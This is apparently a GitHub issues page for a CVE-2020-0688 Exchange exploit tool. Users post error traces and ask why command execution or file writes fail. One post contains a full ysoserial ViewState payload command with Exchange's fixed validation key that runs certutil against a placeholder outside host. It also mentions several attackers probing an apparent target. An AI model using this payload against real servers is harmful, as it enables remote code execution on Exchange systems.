zcgonvh / cve-2020-0688 Goto Github PK

Done

RemoteStub.cs, what i can do with it? Is it a example for the new ActivitySurrogateSelectorGenerator gadget? More detail please.

环境：windows server 2012 +EXchange 2016 + .net 4.5
提示 ：Detect显示 "

但是 CMD显示：fail to create dummy file"
好像是不能生成 LiveIdError.aspx
而且/ecp 下的web.config 显示LiveIdError.aspx可行

When I have a test on exchange 2016, "exec whoami" returns
System.ComponentModel.Win32Exception(0x80004005):?????
? System.Diagnostics.Process.StartWithCreateProcess(ProcessStartInfo,startInfo)
? Zcg.GMHFuckTools.ExampleStub.IISRemoteStub.Run(String proc, String arg)

Emmm, Could u plz give me some advice?

[x]error:
System.Net.WebException: The remote server returned an error: (500) Internal Server Error.
at System.Net.HttpWebRequest.GetResponse()
at Zcg.Exploit.Remote.ExchangeCmd.Main(String[] args)

Why?

背景：因多个攻击者进行复现发起测试端口外连等操作导致线程锁死无法执行任何命令。
最初状态：可执行ping触发dnslog等命令。
现阶段：无法执行任何命令。
使用ExchangeDetect可以测试出存在漏洞。但是使用ExchangeCmd无法写入文件到LiveIdError.aspx。直接访问LiveIdError.aspx服务器会302跳转到 /ecp/error.aspx?aspxerrorpath=/ecp/LiveIdError.aspx 然后触发服务器500的错误。

之前是使用了certutil.exe 去测试端口连接性。使用的是手工的方式。去生成反序列化内容。
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c certutil.exe http://bbbbbbbbbb" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="xxxx" --islegacy -isdebug

目标环境证实可以执行命令。但现在无法执行有什么比较好的办法解决这个问题吗? 感谢

环境：server 2012 r2
exchange 2010 sp3
fidder 抓包：X-AspNet-Version: 2.0.50727
X-OWA-Version: 14.3.123.3
1.测试写入空白LiveIdError.aspx失败，返回值500，server端ecp目录LiveIdError.aspx没有创建成功。
2.在server端提前建立好LiveIdError.aspx，可测试成功。
写入LiveIdError.aspx源码被编译为stub，求助能否提供这段代码，或测试下exchange2010，谢谢。

执行命令时报bad resault